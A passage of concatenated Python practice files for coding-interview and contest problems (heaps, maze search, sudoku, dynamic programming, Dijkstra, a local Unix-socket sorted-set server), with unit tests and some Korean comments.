#check if heap is out of order:
if the_val < rpl_val:
self.heap[emt_idx] = the_val
emt_idx = the_idx
#if heap is in order:
else:
self.heap[emt_idx] = rpl_val
break
#if right child doesn't exist and left child exists:
elif self.getLeftChildIdx(emt_idx) <= self.cnt:
l_idx = self.getLeftChildIdx(emt_idx)
l_val = self.heap[l_idx]
if l_val < rpl_val:
self.heap[emt_idx] = l_val
emt_idx = l_idx
else:
self.heap[emt_idx] = rpl_val
break
#if no child:
else:
self.heap[emt_idx] = rpl_val
break
#return the temporarily saved least value in the heap
return min_val
def PrintHeap( self ):
print self.heap[1:self.cnt+1]
###
###End of Class
###
def unitTest1():
minHeap = MinHeap(10)
for i in [3,4,2,5,6,7,1,8]:
minHeap.addInt(i)
minHeap.PrintHeap()
for i in range(5):
minHeap.popHeap()
minHeap.PrintHeap()
for i in [1,22,3,4,55,-5]:
minHeap.addInt(i)
minHeap.PrintHeap()
for i in range(7):
print minHeap.popHeap()
minHeap.PrintHeap()
def heapSort(arr):
minHeap = MinHeap(len(arr))
for i in arr:
minHeap.addInt(i)
result = []
while(True):
p = minHeap.popHeap()
if p == None:
break
result.append(p[0])
return result
if __name__=="__main__":
arr = [3,4,2,5,6,7,1,8]
print 'arr ->',
print arr
arr_sorted = heapSort(arr)
print 'arr_sorted ->',
print arr_sorted
```
#### File: 00.organize.me/Cracking the Coding Interview/maze.py
```python
import unittest
def parse(s):
return [list(l.strip()) for l in s.strip().splitlines()]
def find_exit_narrow(m, i, j):
''' return True if exit is found, False, otherwise
m will be modified during search
i,j = current poinrt
! : exit point
X : wall
- : aisle
@ : visited
'''
def next_point(m, i, j):
#북동남서 순
for ni, nj in [(i-1,j), (i,j+1), (i+1,j), (i,j-1)]:
if 0 <= ni < len(m) and 0 <= nj < len(m[0]) \
and m[ni][nj] not in "@X":
yield ni, nj
if m[i][j]=='!':
return True
m[i][j] = '@'
for n in next_point(m, i, j):
if find_exit_narrow(m, *n):
return True
m[i][j] = '-'
return False
def find_exit_narrow_by_stack(m, i, j):
def get_neighbors(m, i, j):
for ni, nj in [(i-1,j), (i,j+1), (i+1,j), (i,j-1)]:
if 0 <= ni < len(m) and 0 <= nj < len(m[0]) \
and m[ni][nj] in "-!":
yield ni, nj
assert m[i][j] in '-!'
visited = set()
stack = [(i,j)]
found = False
while stack:
i,j = stack[-1]
if (i,j) not in visited:
visited.add((i,j))
if m[i][j] == '!':
found = True
break
neighbor_found = False
for neighbor_pos in get_neighbors(m, i, j):
if neighbor_pos not in visited:
stack.append(neighbor_pos)
neighbor_found = True
break
if neighbor_found:
continue
stack.pop(-1)
#maybe modify m along stack for road map
for i,j in stack:
if m[i][j] == '-':
m[i][j] = '@'
return found
def find_exit_wide(m, i, j):
''' return True if exit is found, False, otherwise
m will be modified during search
i,j = current poinrt
! : exit point
X : wall
- : aisle
@ : visited
'''
def next_point(m, i, j):
#북동남서 순
for ni, nj in [(i-1,j), (i,j+1), (i+1,j), (i,j-1)]:
if 0 <= ni < len(m) and 0 <= nj < len(m[0]) \
and m[ni][nj] not in "@X":
yield ni, nj
if m[i][j]=='!':
return True
m[i][j] = '@'
for n in next_point(m, i, j):
if find_exit_wide(m, *n):
return True
#m[i][j] = '-'
return False
def pretty_print_maze(m):
for line in m:
print(''.join(line))
class MazeTest(unittest.TestCase):
def setUp(self):
self.solutions = [find_exit_narrow, find_exit_wide, find_exit_narrow_by_stack]
self.sample = '''
-XXXXXX-XXXXXXXXXXXXX
--------XXX---------X
XX-XX-XXXXX-XXXXXXX-X
X--XX-X-XX-------XX-X
X-XXX-X-XX-XX-XXXXX-X
X--XX-X----XX-XX-XX-X
XX-XX-XXXX-XX-XX-XX-X
XX-XX-XXXX-XX-XX-XX-X
XX-XXXXXXX-XX-XX-XX-X
XX---------XX-XX-XX-X
XXXX-XX-XXXXX-XX-XX-X
X-XX-XX-X-----XX-XX-X
X-XX----X-XXX-XX----X
X-XXXXXXXXXXX-XXXXXXX
X-------------------!
XXXXXXXXXXXXXXXXXXXXX'''
self.sample2 = '''
-XXXXXX-XXXXXXXXXXXXX
--------XXX---------X
--------------------X
--------------------X
--------------------X
--------------------X
--------------------X
-------------------XX
XX-XXXXXXX-XXX-X-XX-X
XX---------XXX-X-XX-X
XXXX-XX-XXXXXX-X-XX-X
X-XX-XX-X----X-X-XX-X
X-XX----X-XXXX-X----X
X-XXXXXXXXXXXX-XXXXXX
X-------------------!
XXXXXXXXXXXXXXXXXXXXX'''
self.sample3 = '''
-----
-----
-----
----!'''
self.sample4 = '''
-XXX
-XXX
-XXX
--X!'''
def test_parse(self):
m = parse(self.sample)
assert len(m) > 1
first_len = len(m[0])
self.assertTrue(all(first_len==len(l) for l in m[1:]))
def test_narrow_maze(self):
for solution in self.solutions:
m = parse(self.sample)
self.assertTrue(solution(m, 0, 0))
#pretty_print_maze(m)
def test_wide_maze(self):
for solution in [find_exit_wide, find_exit_narrow_by_stack]:
m = parse(self.sample2)
self.assertTrue(solution(m, 0, 0))
#pretty_print_maze(m)
def test_fail_cases(self):
m = parse(self.sample4)
self.assertFalse(find_exit_narrow(m, 0, 0))
self.assertFalse(find_exit_wide(m, 0, 0))
if __name__=="__main__":
unittest.main()
```
#### File: 00.organize.me/Cracking the Coding Interview/p00_combination_iter.py
```python
def combination_iter(arr, many):
if type(arr)!=list or many<0 or many>len(arr):
assert(False)
result = []
queue = []
for ele in arr:
queue.append([ele])
while(0<len(queue)):
cur_list = queue.pop(0)
if len(cur_list) < many:
for ele in arr:
if cur_list[-1] < ele:
tmp_list = cur_list[:]
tmp_list.append(ele)
queue.append(tmp_list)
elif len(cur_list) == many:
result.append( cur_list )
else:
assert(False)
return result
def combination_wrapper( arr, many ):
#if not monotonically increasing:
#exit
for i in range(len(arr))[:-1]:
if arr[i]>arr[i+1]:
assert(False)
#if monotonically increasing:
return combination_iter(arr,many)
if __name__=="__main__":
arr = [1,2,3,4,5,6]
print combination_wrapper( arr, 1 )
print combination_wrapper( arr, 2 )
print combination_wrapper( arr, 3 )
print combination_wrapper( arr, 4 )
print combination_wrapper( arr, 5 )
print combination_wrapper( arr, 6 )
```
#### File: 00.organize.me/Cracking the Coding Interview/p00_getCombiForCents_queue.py
```python
def getCombiForCents_wrapper(possible_list, mini, maxi=None):
if not maxi:
maxi = (mini-1)+max(possible_list)
return getCombiForCents(possible_list, mini, maxi)
def getCombiForCents(possible_list, mini, maxi):
if not possible_list:
assert(False)
result = []
queue = []
init_list = []
for i in range(len(possible_list)):
init_list.append(0)
#init_list = [0,0,0,0]
for i, price in enumerate(possible_list):
if price <=maxi:
tmp_init_list = init_list[:]
tmp_init_list[i] +=1
queue.append(tmp_init_list)
#queue INVARIANT:
#In queue are EVERY POSSIBLE combinations less than maxi
while( 0<len(queue) ):
#dup_test(queue)
#print len(queue)
#print queue
cur_price_list = queue.pop(0)
cur_price_tot = list_product(possible_list, cur_price_list)
# if mini <= cur_price_tot <= maxi:
if mini <= cur_price_tot:
result.append(cur_price_list)
#pdb.set_trace()
#DO NOT CORRUPT cur_price_list for sibling operations
for i, add_price in enumerate(possible_list):
if (cur_price_tot+add_price) <= maxi:
new_price_list = cur_price_list[:]
new_price_list[i] += 1
#CHECK IF new_price_list is already in queue:
#WITHOUT MEMBERSHIP TEST, INFINITE LOOPING MIGHT HAPPEN.
#queue.append(new_price_list)
if new_price_list not in queue:
queue.append(new_price_list)
#end of while:
#queue is empty
#result is full of adequate list of combinations
return result
def list_product(list1, list2):
if len(list1) != len(list2):
assert(False)
sum = 0
for i in range(len(list1)):
sum += list1[i]*list2[i]
return sum
def dup_test(queue):
queue_len = len(queue)
for i in range(queue_len)[:-1:]:
for j in range(queue_len)[i+1::]:
if queue[i] == queue[j]:
print 'oh no:',(i, j), len(queue), queue[i]
#assert(False)
def test1():
mini = 1000
maxi = 1000
possible_list = [ 25, 10, 5, 1 ]
#change = 99
#possible_list = [ 19, 6 ,7, 17 ]
result = getCombiForCents_wrapper(possible_list, mini, maxi)
print result
print len(result)
if __name__=="__main__":
#print list_product([3,4,5],[1,2,1])
import pdb
test1()
#dup_test([1,2,3,9,5,6,7,8,9])
```
#### File: 00.organize.me/Cracking the Coding Interview/p064_00_getLeastIntFromRotatedSequence.py
```python
def getLeastIntFromRotatedSequence(ls):
left=0
right=len(ls)-1
if ( ls[left] < ls[right] ):
return ls[0]
while(right-left != 1):
mid = (left+right) / 2
if( ls[left] <= ls[mid] ):
left = mid
else:
right = mid
#out of loop, right must be the index of the least int
return ls[right]
test_ls= [ [3,4,5,6,7,-11,2],
[5,6,7,3,4,5,5,5],
[1,2],
[2,1],
[-100,0,100],
[3,100,1],
[10,1,2,3,4,5,6,7,8,9],
[2,3,4,5,6,7,8,9,10,1] ]
#test part
for each_list in test_ls:
print getLeastIntFromRotatedSequence( each_list )
```
#### File: 00.organize.me/Cracking the Coding Interview/p140_01_stairways_recur.py
```python
def stairways_recur(n_step):
if n_step < 1:
return []
elif n_step == 1:
return [[1]]
result = []
result1 = joiner( 1, stairways_recur(n_step-1) )
result2 = joiner( 2, stairways_recur(n_step-2) )
result3 = joiner( 3, stairways_recur(n_step-3) )
result = result1 + result2 + result3
return result
def joiner(ele, double_list):
result = []
for single_list in double_list:
result.append( [ele] + single_list[:] )
return result
if __name__ == "__main__":
result = stairways_recur(10)
print result
print len(result)
```
#### File: 00.organize.me/Cracking the Coding Interview/prison_break.py
```python
import unittest
from math import factorial
from functools import reduce
from operator import mul
from itertools import combinations_with_replacement as comb_r
def prisoners(days):
'''아... comb_r이 경우의 수가 지수적으로 증가하는 관꼐로 현실적 계산이 불가하다.'''
if days < 100:
return 0
up1 = factorial(100)
down1 = 100**100
up2 = sum(reduce(mul, each) for each in comb_r(range(1, 101), days-100)) if days>100 else 1
down2 = 100 ** (days-100)
return up1 / down1 * up2 / down2
def stats():
days = 1
while True:
person = 1 - (0.99)**days
yield days, person**100
days += 1
def prisoners_simple():
it_stats = stats()
thresholds = [0.5, 0.6, 0.70, 0.80, 0.90, 0.95,\
0.99, 0.999, 0.9999, 0.99999, 0.999999, 0.9999999999, 1]
for threshold in thresholds:
while True:
days, thres = next(it_stats)
if threshold <= thres:
print("threshold(%s): %s days" %(thres, days))
break
class XTest(unittest.TestCase):
def test_method1(self):
s = stats()
while True:
days, p1 = next(s)
if days==101:
break
p2 = prisoners(101)
self.assertEqual(p1, p2)
if __name__=="__main__":
prisoners_simple()
unittest.main()
```
#### File: 00.organize.me/Cracking the Coding Interview/product.py
```python
def product(*lists):
for ls in lists:
assert len(ls)>0
idx_list = [0]*len(lists)
len_list = [len(ls) for ls in lists]
while True:
val_list = []
# ex) idx_list = [0,1,0]
for i,idx in enumerate(idx_list):
val_list.append(lists[i][idx])
yield val_list
try:
idx_list = add_one(len_list, idx_list)
except ValueError:
break
def add_one(radix_list, idx_list):
#pre-assertion
assert len(radix_list) == len(idx_list)
if radix_list==[idx+1 for idx in idx_list]:
raise ValueError
for i, val in enumerate(idx_list):
assert radix_list[i] > val
#logic
idx_list[-1]+=1
for digit in range(len(idx_list))[::-1]:
if idx_list[digit] == radix_list[digit]:
#transactional
idx_list[digit-1] += 1
idx_list[digit] = 0
else:
break
#post-assertion
for i, val in enumerate(idx_list):
assert radix_list[i] > val
return idx_list
if __name__=="__main__":
print('implemented_product')
#for each in product('ㄱㄴㄷ','abc','123'):
# print(each)
result = product('ㄱㄴㄷ','abc','123')
while True:
print(next(result))
```
#### File: 00.organize.me/Cracking the Coding Interview/sudoku.py
```python
import unittest
def parse(s):
lines = [line.strip() for line in s.strip().splitlines()]
res = []
for line in lines:
li = []
for e in line:
if e == '*':
li.append(None)
else:
li.append(int(e))
res.append(li)
return res
def sudoku(s):
''' returns True if s is fully filled successfully. False, otherwise '''
def pick_one(s):
for i in range(9):
for j in range(9):
if s[i][j] == None:
return i,j
def is_sudoku_complete(s):
for line in s:
if None in line:
return False
return True
def is_possible(s, i, j, v):
if v in s[i]:
return False
for r in range(9):
if s[r][j] == v:
return False
r_start = (i//3)*3
c_start = (j//3)*3
for r in range(r_start, r_start+3):
for c in range(c_start, c_start+3):
if s[r][c]==v:
return False
return True
i,j = pick_one(s)
for v in range(1,10):
if not is_possible(s,i,j,v):
continue
s[i][j] = v
if is_sudoku_complete(s):
return True
if sudoku(s):
return True
s[i][j] = None
return False
class SudokuTest(unittest.TestCase):
def setUp(self):
self.sample = '''
128**547*
**5*8*39*
9*36428**
4**51*68*
78*4*3*59
*36*98**1
**43791*8
*69*2*5**
*178**924'''
self.sample2 = '''
*2*63****
6**4***1*
****5**7*
**39****4
**8***6**
7****35**
*4**2****
*5***8**9
****91*3*
'''
self.sample3 = '''
*********
*********
*********
*********
*********
*********
*********
*********
*********
'''
def test_parse(self):
s = parse(self.sample)
self.assertEqual(len(s), 9)
for i in range(9):
self.assertEqual(len(s[i]), 9)
def test_sudoku(self):
s = parse(self.sample3)
succeed = sudoku(s)
self.assertTrue(succeed)
import pprint
pprint.pprint(s)
for line in s:
self.assertEqual(sum(line), 45)
for col in range(9):
col_sum = 0
for row in range(9):
col_sum += s[row][col]
self.assertEqual(col_sum, 45)
for r in [0,3,6]:
for c in [0,3,6]:
self.assertEqual(sum(s[x][y] for x in [r,r+1,r+2] for y in [c,c+1,c+2]), 45)
if __name__=="__main__":
unittest.main()
```
#### File: hackerrank/sorted_set/client.py
```python
import socket
import struct
import threading
SERVER_SOCKET_PATH = "./socket"
FMT = "!L"
def read_number_from_socket(connection):
return struct.unpack(FMT, connection.recv(4))[0]
def write_number_to_socket(connection, number):
connection.send(struct.pack(FMT, number))
def client(t_id):
sock = socket.socket(socket.AF_UNIX)
sock.connect(SERVER_SOCKET_PATH)
with open('./input.txt', 'r') as fp:
commands = fp.read()
for command in commands.splitlines():
for opt in command.split():
sock.send(struct.pack(FMT, int(opt)))
value_cnt = read_number_from_socket(sock)
print(value_cnt)
for _ in range(value_cnt):
value = read_number_from_socket(sock)
#print('tid', t_id, value)
print(value)
sock.close()
print('termnated', t_id)
def main():
for t_id in range(1):
t = threading.Thread(target=client, args=(t_id,))
t.start()
if __name__ == "__main__":
main()
```
#### File: hackerrank/sorted_set/server2.py
```python
import socket, threading
from queue import Queue
import sys, struct
# NOTE: Use this path to create the UDS Server socket
SERVER_SOCKET_PATH = "./socket";
class Result:
def __init__(self):
self._evt = threading.Event()
self._result = None
def set_result(self, value):
self._result = value
self._evt.set()
def result(self):
self._evt.wait()
return self._result
class ActorExit(Exception):
pass
class Actor(object):
def __init__(self):
self._mailbox = Queue()
def send(self, msg):
self._mailbox.put(msg)
def recv(self):
msg = self._mailbox.get()
if msg is ActorExit:
raise ActorExit()
return msg
def close(self):
self.send(ActorExit)
def start(self):
self._terminated = threading.Event()
t = threading.Thread(target=self._bootstrap)
t.daemon = True
t.start()
def _bootstrap(self):
try:
self.run()
except ActorExit:
pass
finally:
self._terminated.set()
def join(self):
self._terminated.wait()
def run(self):
while True:
msg = self.recv()
class Worker(Actor):
def __init__(self):
super().__init__()
self.db = {}
def submit(self, values):
r = Result()
self.send((values, r))
return r
def run(self):
while True:
values, r = self.recv()
r.set_result(self.execute(values))
def execute(self, values):
cmd, *opts = values
print('[*]', cmd, opts)
if cmd == 1: #add
s, k, v = opts
self.db.setdefault(s, {})
self.db[s][k] = v
return [0]
elif cmd == 2: #remove
s, k = opts
if s in self.db and k in self.db[s]:
self.db[s].pop(k)
return [0]
elif cmd == 3: #get size
s = opts[0]
size = len(self.db[s]) if s in self.db else 0
return [1, size]
elif cmd == 4: #get value
s, k = opts
if s in self.db and k in self.db[s]:
score = self.db[s][k]
else:
score = 0
return [1, score]
elif cmd == 5: #range
*sets, _, lower, upper = opts
res = []
for s in sets:
if s not in self.db:
continue
for k,v in self.db[s].items():
if lower <= v <= upper:
res.append((k,v))
res.sort()
return [len(res)*2] + [e for kv in res for e in kv]
elif cmd == 6: #disconnect
return None
else:
raise Exception("Not supported CMD(%s)" % (cmd))
FMT = "!L"
def read_number_from_socket(connection):
return struct.unpack(FMT, connection.recv(4))[0]
def write_number_to_socket(connection, number):
connection.send(struct.pack(FMT, number))
def process_client_connection(connection, worker):
while True:
value_num = read_number_from_socket(connection)
values = []
for _ in range(value_num):
values.append(read_number_from_socket(connection))
res = worker.submit(values)
if res.result() == None:
break
for num in res.result():
write_number_to_socket(connection, num)
connection.close()
def main():
worker = Worker()
worker.start()
s = socket.socket(socket.AF_UNIX)
s.bind(SERVER_SOCKET_PATH)
s.listen(1)
while True:
cl, addr = s.accept()
t = threading.Thread(target = process_client_connection, args=(cl, worker))
t.start()
#worker.close()
s.close()
if __name__ == '__main__':
main()
```
#### File: quizzes/00.organize.me/tree_with_insert_at.py
```python
class Solution:
# @param A : list of integers
# @param B : list of integers
# @return a list of integers
def order(self, A, B):
root = None
for _id, k in zip(A,B):
root = insert_at(root, k, Node(_id))
return list(n._id for n in traverse_in_order(root))
class Node(object):
def __init__(self, _id):
self._id = _id
self.left = self.right = None
self.size = 1
def set_left(self, left):
self.left = left
self.resize()
return self
def set_right(self, right):
self.right = right
self.resize()
return self
def resize(self):
self.size = 1 + get_size(self.left) + get_size(self.right)
def get_size(node):
if not node: return 0
return node.size
def insert_at(root, k, node):
assert node
if not root: return node
if k < 0: k = 0
if k > root.size: k = root.size
left_size = get_size(root.left)
if left_size > k:
return root.set_left(insert_at(root.left, k, node))
elif left_size == k:
l = root.left
root.set_left(None)
node.set_left(l)
node.set_right(root)
return node
else:
new_right = insert_at(root.right, k-1-left_size, node)
root.set_right(new_right)
return root
def traverse_in_order(node):
if not node: return
if node.left: yield from traverse_in_order(node.left)
yield node
if node.right: yield from traverse_in_order(node.right)
```
#### File: 2019/02.you_can_go_your_own_way/solution.py
```python
def solve(n, her_path):
return ''.join(['E' if c=='S' else 'S' for c in her_path])
def main():
t = int(input())
for i in range(1, t+1):
n = int(input())
her_path = input().strip()
my_path = solve(n, her_path)
print("Case #{}: {}".format(i, my_path))
if __name__ == "__main__":
main()
```
#### File: 2019/03.cryptopangrams/test.py
```python
import unittest
from solution import solve
from string import ascii_uppercase
C2P = {'A': 2, 'B': 3, 'C': 5, 'D': 7, 'E': 11, 'F': 13, 'G': 17, 'H': 19, 'I': 23, 'J': 29, 'K': 31, 'L': 37, 'M': 41, 'N': 43, 'O': 47, 'P': 53, 'Q': 59, 'R': 61, 'S': 67, 'T': 71, 'U': 73, 'V': 79, 'W': 83, 'X': 89, 'Y': 97, 'Z': 101}
P2C = {2: 'A', 3: 'B', 5: 'C', 7: 'D', 11: 'E', 13: 'F', 17: 'G', 19: 'H', 23: 'I', 29: 'J', 31: 'K', 37: 'L', 41: 'M', 43: 'N', 47: 'O', 53: 'P', 59: 'Q', 61: 'R', 67: 'S', 71: 'T', 73: 'U', 79: 'V', 83: 'W', 89: 'X', 97: 'Y', 101: 'Z'}
def assert_pangram(text):
assert len(set(text)) == 26
def make_ciphertext(plain_text):
text = plain_text.replace(' ', '').upper()
assert_pangram(text)
cipher = []
for c1, c2 in zip(text, text[1:]):
cipher.append(C2P[c1] * C2P[c2])
return ' '.join(map(str, cipher))
class SolutionTest(unittest.TestCase):
def test_make_ciphertext(self):
cipher = make_ciphertext('jin choi' + ascii_uppercase)
print(cipher)
def test_basic1(self):
cipher = make_ciphertext('jin choi' + ascii_uppercase)
plain = solve(cipher)
print(plain)
def test_min_at_first(self):
''' enforce min_i is the first'''
cipher = make_ciphertext('aa' + ascii_uppercase + 'zz')
plain = solve(cipher)
print(plain)
def test_min_at_last(self):
''' enforce min_i is the last'''
cipher = make_ciphertext('zz' + ascii_uppercase + 'aa')
plain = solve(cipher)
print(plain)
unittest.main()
```
#### File: quizzes/cracking_coding_interview/0202.minus_kth_in_linked_list.py
```python
def inversely_kth(ll, k):
pass
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
self.assertInverselyKth([], 0, None)
self.assertInverselyKth([], 3, None)
self.assertInverselyKth([1], 0, 1)
self.assertInverselyKth([1], 1, None)
self.assertInverselyKth([1,2], 0, 2)
self.assertInverselyKth([1,2], 1, 1)
self.assertInverselyKth([1,2], 2, None)
self.assertInverselyKth([1,2,3,4,5], 0, 5)
self.assertInverselyKth([1,2,3,4,5], 1, 4)
self.assertInverselyKth([1,2,3,4,5], 2, 3)
self.assertInverselyKth([1,2,3,4,5], 3, 2)
self.assertInverselyKth([1,2,3,4,5], 4, 1)
self.assertInverselyKth([1,2,3,4,5], 5, None)
def assertInverselyKth(self, ll, k, expected_val):
pass
if __name__ == "__main__":
unittest.main()
```
#### File: etc/arrays/rotate_matrix.py
```python
from jpylib.jitertools import ring_iter
from collections import deque
def rotate_matrix(matrix):
''' shift elements to clockwise direction by 1 '''
i, j = 0, 0
n = len(matrix)
h = n >> 1
while i < h:
#subtask
rotate_ring(matrix, i, n-1-i, i, n-1-i)
i += 1
j += 1
return matrix
def rotate_ring(matrix, T, B, L, R):
i0 = T
dq = deque([matrix[i0+1][i0]])
for i,j in ring_iter(T, B, L, R):
dq.append(matrix[i][j])
val = dq.popleft()
matrix[i][j] = val
if __name__ == "__main__":
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
self.assertEqual(rotate_matrix([]), [])
self.assertEqual(rotate_matrix([[1]]), [[1]])
self.assertEqual(rotate_matrix([[1,2],[3,4]]), [[3,1],[4,2]])
self.assertEqual(rotate_matrix([[1,2,3],[4,5,6],[7,8,9]]), [[4,1,2],[7,5,3],[8,9,6]])
self.assertEqual(rotate_matrix([[1,2,3,4],[5,6,7,8],[9,10,11,12],[13,14,15,16]]),
[[5,1,2,3],[9,10,6,4],[13,11,7,8],[14,15,16,12]])
unittest.main()
```
#### File: quizzes/euler_prime_quiz/prime.py
```python
from math import sqrt
fp = open('./euler.txt', 'r')
euler = fp.readline().strip()[2:] #remove 2.7
def get_euler(fr, to):
global euler
if fr <= to <= len(euler):
return euler[fr:to]
#append if possible
line = fp.readline()
if(line):
euler = euler + line.strip()
return get_euler(fr, to)
#doom!
return None
def test_get_euler():
for i in range(100):
ee = get_euler(i, i+10)
print(ee)
def is_prime(n):
for i in range(2, int(sqrt(n))+1):
if(n%i==0): return False
else:
return True
def main():
for i in range(0,500):
x = get_euler(i, i+10)
x = int(x)
if(len(str(x))!=10): continue
if( is_prime(x) ):
print("")
print("prime: ", x)
else:
print('.', sep="", end="")
if __name__ == '__main__':
main()
#test_get_euler()
#close always
fp.close()
```
#### File: algorithms/dp/lego_blocks.py
```python
import sys
sys.setrecursionlimit(100000)
MOD = 1000000007
ROW_COMBIS = [1, 1, 2, 4, 8]
TOT_COMBIS = [1, 1]
SOL_COMBIS = []
NOTSOL_COMBIS = []
def lego(n, m):
assert 1<=n<=1000 and 1<=m<=1000
global TOT_COMBIS, SOL_COMBIS, NOTSOL_COMBIS
TOT_COMBIS = [1, 1]
SOL_COMBIS = [1, 1] + [None] * (m-1)
NOTSOL_COMBIS = [0, 0] + [None] * (m-1)
for x in range(m+1):
solid(n, x)
return solid(n, m)
def solid(n, m):
if SOL_COMBIS[m] == None:
ans = total(n, m) - not_solid(n, m)
ans %= MOD # in case it becomes negative
SOL_COMBIS[m] = ans
return SOL_COMBIS[m]
def total(n, m):
while m >= len(ROW_COMBIS):
val = sum(ROW_COMBIS[-4:]) % MOD
ROW_COMBIS.append(val)
while m >= len(TOT_COMBIS):
l = len(TOT_COMBIS)
val = pow(ROW_COMBIS[l], n, MOD)
TOT_COMBIS.append(val)
return TOT_COMBIS[m]
def not_solid(n, m):
if NOTSOL_COMBIS[m] == None:
parts = 0
for i in range(1, m):
parts += solid(n, i) * total(n, m-i)
parts %= MOD
NOTSOL_COMBIS[m] = parts
return NOTSOL_COMBIS[m]
def main():
t = int(input())
for _ in range(t):
n, m = map(int, input().split())
print(lego(n, m))
#main()
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
self.assertEqual(lego(2,2), 3)
self.assertEqual(lego(3,2), 7)
self.assertEqual(lego(2,3), 9)
self.assertEqual(lego(4,4), 3375)
if __name__ == "__main__":
unittest.main()
```
#### File: algorithms/dp/substring_diff.py
```python
from collections import deque
def substring_diff(S, P, Q):
p_len = len(P)
assert 0 <= S <= p_len
p_len = len(P)
ans = 0
for j in range(p_len):
ans = max(ans, diagonal_max_length(S, P, Q, 0, j))
for i in range(1, p_len):
ans = max(ans, diagonal_max_length(S, P, Q, i, 0))
return ans
def diagonal_max_length(S, P, Q, i, j):
p_len = len(P)
ans = 0
left = -1
mismatches = deque() #offset for mismatches
for right in range(p_len - max(i, j)):
ni, nj = i+right, j+right
if P[ni]==Q[nj]:
pass
elif S > 0:
S -= 1
mismatches.append(right)
else:
left = mismatches.popleft() if mismatches else right
mismatches.append(right)
length = right - left
ans = max(ans, length)
return ans
def main():
t = int(input())
for _ in range(t):
_S, P, Q = input().split()
S = int(_S)
L = substring_diff(S, P, Q)
print(L)
#main()
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
for S,P,Q,ANS in [(2,'tabriz','torino',4), \
(0,'abacba','abcaba',3), \
(3,'helloworld','yellowmarin',8)]:
self.assertEqual(substring_diff(S, P, Q), ANS)
if __name__ == "__main__":
unittest.main()
```
#### File: algorithms/dp/xor_and_sum.py
```python
MOD = 1000000007
def solution(a, b):
a = int(a, base=2)
b = int(b, base=2)
return xor_and_sum(a, b)
def xor_and_sum(a, b):
s = 0
for i in range(314159+1):
s += a ^ (b<<i)
return s % MOD
def main():
a, b = input(), input()
print(solution(a, b))
#main()
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
a, b = '10', '1010'
self.assertEqual(solution(a, b), 489429555)
if __name__ == "__main__":
unittest.main()
```
#### File: algorithms/graph/dijkstra_shortest_path.py
```python
from collections import defaultdict
from math import inf
from jpylib.jqueues import PriorityQueue
def solution(n, g, s):
''' return shortest distance from `s` to
other edges in ascending order of node id
return [ distance :: int ] '''
dists = [inf] * (n+1) # dist[0] is dummy
dists[s] = 0
pq = PriorityQueue([(0,s)])
while pq.not_empty():
dist, here = pq.pop()
if dists[here] < dist:
# pq에 들어온 후, here에 닿는
# 더 짧은 루트 방법이 생긴 셈.
# 따라서 here는 진행하지 않음.
continue
for there, cost in g[here].items():
next_dist = dists[here]+cost
if dists[there] > next_dist:
# bfs의 discovered 역할
# 즉, there에 도착할 더 짧은
# 방법이 발견 됐을 때만 실행됨
dists[there] = next_dist
pq.push((next_dist, there))
return dist_in_order(n, s, dists)
def dist_in_order(n, s, dists):
res = []
for u in range(1, n+1):
if u==s: continue
d = -1 if dists[u] == inf else dists[u]
res.append(d)
return res
def g_add(g, x, y, r):
g[x][y] = min(r, g[x].get(y, inf))
g[y][x] = min(r, g[y].get(x, inf))
def main():
t = int(input().strip())
for a0 in range(t):
g = defaultdict(dict) # {u: {v:r} }
n,m = input().strip().split(' ')
n,m = [int(n),int(m)]
for a1 in range(m):
x,y,r = input().strip().split(' ')
x,y,r = [int(x),int(y),int(r)]
g_add(g, x, y, r)
s = int(input().strip())
print(*solution(n, g, s))
#main()
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
n, m = 4, 4
g = defaultdict(dict)
g_add(g, 1, 2, 24)
g_add(g, 1, 4, 20)
g_add(g, 3, 1, 3)
g_add(g, 4, 3, 12)
s = 1
self.assertEqual(solution(n, g, s), [24,3,15])
if __name__ == "__main__":
unittest.main()
```
#### File: programming/arrays/n_over_3_repeat_number.py
```python
from collections import Counter
class Solution:
# @param A : tuple of integers
# @return an integer
def repeatedNumber(self, A):
c = Counter(A)
most_freq = c.most_common(1)
if not most_freq:
return -1
i, cnt = most_freq[0]
return i if len(A)/3 < cnt else -1
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
sol = Solution()
self.assertEqual(sol.repeatedNumber([]), -1)
self.assertEqual(sol.repeatedNumber([1,2,3,1,1]), 1)
self.assertEqual(sol.repeatedNumber([3,3,3]), 3)
self.assertEqual(sol.repeatedNumber([1,2,3]), -1)
self.assertEqual(sol.repeatedNumber([1,2,3,4,5]), -1)
if __name__ == "__main__":
unittest.main()
```
#### File: programming/binary_search/rotated_sorted_array_search.py
```python
class Solution:
# @param A : tuple of integers
# @param B : integer
# @return an integer
def __init__(self, min_index):
self.min_index = min_index
def search(self, arr, target):
n = len(arr)
r = self.min_index(arr)
i, j = r, r+n-1
while i<=j:
k = i+j>>1
if arr[k%n] == target:
return k%n
elif arr[k%n] > target:
j = k-1
else:
i = k+1
return -1
def min_index_nodup_1(arr):
''' @param arr: unique elements
@return min index of the smallest value in arr
Time Complexity O(lgn) '''
n = len(arr)
i, j = 0, n-1
if arr[i] < arr[j]:
return 0
assert arr[i] > arr[j]
while j-i > 1:
k = i+j>>1
if arr[i] < arr[k]: i = k
elif arr[k] < arr[j]: j = k
#assert j-i <= 1
return j
def min_index_nodup_2(arr):
''' @param arr: unique elements
@return min index of the smallest value in arr
Time Complexity O(lgn) '''
n = len(arr)
i, j = 0, n-1
if arr[i] < arr[j]:
return 0
assert arr[i] > arr[j]
while i < j:
k = i+j>>1
if arr[i] < arr[k]: i = k+1
else: j = k
return i
# NOTE : Think about the case when there are duplicates.
# Q: Does your current solution work? A: No
# Q: How does the time complexity change? A: Yes
def min_index_dup_1(arr, i, j):
''' @param arr: duplicate elements
@return min index of the smallest value in arr
Time Complexity Omega(lgn) ~ O(n) '''
n = j-i+1
assert n > 0
if n==1: return 0
if n==2: return 0 if arr[i] <= arr[j] else j
if arr[i] < arr[j]:
return 0
elif arr[i] > arr[j]:
while i+1 < j:
k = i+j>>1
if arr[i] <= arr[k]:
i = k
else:
j = k
return j
else:
k = i+j>>1
res1 = min_index_dup_1(arr, i, k)
if res1 > 0:
return res1
return min_index_dup_1(arr, k, j)
import unittest
class SolutionTest(unittest.TestCase):
